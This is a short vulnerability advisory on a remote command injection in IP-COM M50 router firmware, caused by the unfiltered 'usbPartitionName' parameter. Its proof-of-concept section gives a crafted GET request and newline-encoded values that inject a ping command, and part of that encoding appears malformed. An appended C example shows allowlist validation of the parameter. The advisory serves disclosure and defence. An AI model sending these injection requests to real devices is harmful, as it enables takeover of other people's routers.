ip-com-12

vendor:IP-COM

product:M50

version:V15.11.0.33(10768)

type:Remote Command Injection

author:Yifeng Li, Wolin Zhuang;

Vulnerability description

We found a command injection vulnerability in IP-COM's M50 routers running recently released firmware. It allows remote attackers to execute arbitrary OS commands via a crafted GET request.

Remote Command Injection vulnerability

In the formSetUSBPartitionUmount function, the user-supplied "usbPartitionName" parameter is not sufficiently filtered, so we can set usbPartitionName to a value such as “-h%0aping%20x.x.x.x%20-w%2-5%0a” to attack the OS.


PoC

Remote Command Injection

We set the value of "usbPartitionName" to aaa\nping x.x.x.x, and the router executes the ping command.

example.com/action/umountUSBPartition?usbPartitionName=-h ping x.x.x.x -w%2-5
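One way a handler could filter this parameter, shown as an added example that is not the vendor's code or part of the original advisory. It assumes the value ends up in a shell command (which the newline payload implies); the function names, the 32-character limit and the MOUNT_ROOT path are hypothetical.

```c
#include <stddef.h>
#include <string.h>

#define PART_NAME_MAX 32        /* assumed upper bound for this example */
#define MOUNT_ROOT "/mnt/usb/"  /* placeholder path, not from the advisory */

/* Return 1 only if name is a plain partition token such as "sda1".
 * Allowlist: ASCII letters, digits, '_' and '-'; never a leading '-'
 * (so it cannot be parsed as an option), never empty or over-long.
 * Everything else, including '\n' (%0a), space, ';', '|', '$', '`'
 * and '/', is rejected rather than escaped. */
int usb_partition_name_ok(const char *name)
{
    size_t i;

    if (name == NULL || name[0] == '-')
        return 0;
    for (i = 0; name[i] != '\0'; i++) {
        char c = name[i];
        if (i >= PART_NAME_MAX)
            return 0;
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '_' || c == '-'))
            return 0;
    }
    return i > 0;
}

/* Build an argument vector for an execv()-style call, so the validated
 * value is passed as a single argument and no shell ever parses it.
 * Returns 0 on success, -1 if the name is rejected or path_buf is too small. */
int build_umount_argv(const char *name, char *path_buf, size_t path_len,
                      const char *argv[3])
{
    if (!usb_partition_name_ok(name))
        return -1;
    if (strlen(MOUNT_ROOT) + strlen(name) + 1 > path_len)
        return -1;
    strcpy(path_buf, MOUNT_ROOT);
    strcat(path_buf, name);
    argv[0] = "umount";
    argv[1] = path_buf;
    argv[2] = NULL;
    return 0;
}
```

Both values quoted in the advisory (the "-h" form with an embedded newline and the "aaa\nping x.x.x.x" form) fail the allowlist before any command is built.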
